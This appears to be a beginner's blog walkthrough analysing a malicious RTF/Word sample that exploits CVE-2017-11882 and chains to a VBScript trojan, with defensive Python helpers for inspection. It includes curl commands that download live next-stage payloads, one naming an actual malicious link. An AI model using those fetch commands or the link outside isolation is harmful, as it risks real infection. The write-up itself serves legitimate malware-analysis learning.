Analysing a malware sample

After learning the basics of malware analysis, I decided to challenge myself by analyzing a real-world sample. I picked a recent upload from Malware Bazaar, which had no tags at the time. My objective was to identify what type of malware it was and understand its behavior.

This is the sample: https://bazaar.abuse.ch/sample/613b4de5c0a4a0efc484e93eff8281250787bbe45e0652754eee9cbf1186cebb/

Warning: Remember to perform malware analysis in a safe, isolated environment.

Initial Inspection

The file under analysis had a .doc extension, suggesting it was a Microsoft Word document. To extract metadata, I ran olemeta sample.doc. However, this threw an exception, "not an OLE2 structured storage file", meaning the file wasn't a legacy (OLE2) Word document despite its extension.

Using Detect It Easy (DIE), I found that the file was actually an archive. After extracting its contents, I discovered it was an RTF (Rich Text Format) file, which I could also inspect in VS Code.
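The file type check can also be approximated by hand by looking at the first few bytes of the file. The snippet below is a minimal sketch of that idea, not what DIE does internally; the function names are made up for illustration and only the three formats that come up in this post are covered.

```python
# Magic-byte prefixes for the formats mentioned in this post.
# This table is illustrative, not an exhaustive signature list.
MAGIC = [
    (bytes.fromhex("d0cf11e0a1b11ae1"), "OLE2 compound file (legacy .doc/.xls/.ppt)"),
    (b"PK\x03\x04", "ZIP archive (also the container used by .docx/.xlsx)"),
    (b"{\\rt", "RTF document"),
]


def identify(header: bytes) -> str:
    """Return a rough format label based on the leading bytes."""
    for magic, label in MAGIC:
        if header.startswith(magic):
            return label
    return "unknown"


def identify_file(path: str) -> str:
    """Read only the first 8 bytes of a file and classify them."""
    with open(path, "rb") as fh:
        return identify(fh.read(8))
```

Calling identify_file("sample.doc") on a file like the one above would be expected to report a ZIP archive rather than an OLE2 file, which matches the olemeta error.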

Next, I used oleid to check for suspicious indicators such as embedded objects: oleid sample.doc. The results revealed an external relationship within the document. Running oleobj on the same file returned an object name and an external link, likely leading to a second-stage payload.
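To see where such a link lives, here is a rough sketch that lists external relationships by hand. It assumes the archive is an Office Open XML package (the post only says "archive"), where relationships are stored in .rels parts; the function name is hypothetical and this is not how oleid or oleobj are implemented.

```python
import zipfile
import xml.etree.ElementTree as ET

# Namespace of relationship parts in Open Packaging Conventions packages.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(package):
    """Return (rels_part, type, target) for every external relationship.

    `package` is a path or a binary file-like object. Assumption: the
    input is a ZIP-based Office document. Only run this on untrusted
    files inside an isolated analysis environment.
    """
    found = []
    with zipfile.ZipFile(package) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found
```

Any target that points to a remote URL is worth a closer look, since the document will try to fetch it when opened.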

I attempted to retrieve the linked payload using curl. The first request, curl --output file_2.rtf https://agr.my/X7TO8b, returned a redirect, so I followed it to get the actual file: curl --output file_2.rtf <redirected_url>. (curl's -L option follows redirects automatically.)

Then, I uploaded the document to Hybrid Analysis, which identified CVE-2017-11882 as the exploit used.

  • https://www.hybrid-analysis.com/sample/5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da/67ead51d92d9e3292808211e
  • sha256: 5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da
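Before comparing notes with an online report, it helps to confirm that the local file has the same hash. A minimal sketch, assuming the hash above belongs to the file that was uploaded; the function name and the chunk size are arbitrary choices.

```python
import hashlib

# SHA-256 listed in the Hybrid Analysis report above.
REPORTED_SHA256 = "5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da"


def sha256_of(path: str, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so large samples need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_report(path: str) -> bool:
    """True if the local file is the one described in the report."""
    return sha256_of(path) == REPORTED_SHA256
```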

CVE-2017-11882 is a memory corruption vulnerability in the Microsoft Office Equation Editor that allows attackers to execute arbitrary code when a victim opens a malicious document.

Extracting the Payload from RTF

Since the second-stage file contained executable code, I needed to extract it. While researching, I found an article describing a similar case.

Following its guidance, I extracted the payload using:

rtfdump.py -F -s 1 -d ./example/file_2.rtf | oledump.py -s 1 -d > out.txt
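Conceptually, RTF stores embedded objects as hexadecimal text inside an \objdata group, so extraction boils down to finding that text and decoding it. The sketch below illustrates only that idea on well-behaved input. It is not how rtfdump.py works, the function name is invented, and real samples usually break up the hex with control words and nested groups that this naive regex will not handle.

```python
import re


def objdata_blobs(rtf_text: str) -> list:
    """Decode the hex payload that directly follows each \\objdata control word.

    Assumption: the hex run is contiguous apart from whitespace and
    ends at the next brace or backslash.
    """
    blobs = []
    for match in re.finditer(r"\\objdata\b([^{}\\]*)", rtf_text):
        # Keep hex digits only; RTF writers wrap the data across lines.
        hex_digits = re.sub(r"[^0-9A-Fa-f]", "", match.group(1))
        if len(hex_digits) % 2:
            # Drop a dangling nibble so bytes.fromhex does not raise.
            hex_digits = hex_digits[:-1]
        blobs.append(bytes.fromhex(hex_digits))
    return blobs
```

For anything obfuscated, the purpose-built tools above remain the better choice.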

Analyzing the Third-Stage Payload

The extracted payload was an obfuscated file. To analyze it, I used scdbg, a shellcode emulator that runs shellcode in a controlled environment and logs what it does. I ran it with two options:

  • -r: report mode, to log execution behavior,
  • -findsc: findsc mode, to locate embedded shellcode.

I then downloaded the next-stage file, a .vbe (encoded VBScript) script, from a URL that is redacted here:

curl --output malicious.vbe badurl/vbe

I also used Cutter, an open-source reverse engineering platform, to analyze the shellcode. It appears to manipulate the byte order or reverse the string to decode data and load .NET assembly bytecode directly into memory.
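As an illustration of the "reverse the string, then decode" pattern, here is a small sketch. The use of Base64 is purely an assumption, since the encoding in this sample is not identified above; both function names are hypothetical. The check for the MZ header relies on the fact that .NET assemblies are PE files.

```python
import base64


def decode_reversed_base64(blob: str) -> bytes:
    """Reverse the text, then Base64-decode it (assumed encoding)."""
    return base64.b64decode(blob[::-1])


def looks_like_pe(data: bytes) -> bool:
    """PE files, including .NET assemblies, start with the bytes 'MZ'."""
    return data[:2] == b"MZ"


# Build a toy input the same way a dropper might store its payload.
toy_payload = b"MZ\x90\x00not a real assembly"
stored = base64.b64encode(toy_payload).decode("ascii")[::-1]

decoded = decode_reversed_base64(stored)
print(looks_like_pe(decoded))
```

If a decoded blob passes a check like this, it can be written to disk inside the analysis VM and opened in a .NET decompiler.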

From here, the analysis becomes more complex, as the payload needs to be deobfuscated.

I uploaded malicious.vbe to Hybrid Analysis, which classified it as a Trojan: https://www.hybrid-analysis.com/sample/42e843cba5acfcc113932267d0bf11fbf973a474f40ae473d32a49243e7fc93d

Conclusion

This was my first hands-on malware analysis experience, and it helped me understand:

  • How malicious documents use external relationships to fetch additional payloads,
  • The exploitation of CVE-2017-11882 in RTF-based attacks,
  • Techniques for extracting embedded payloads from document files,
  • How multi-stage malware works, leading to Trojan infections.

Resources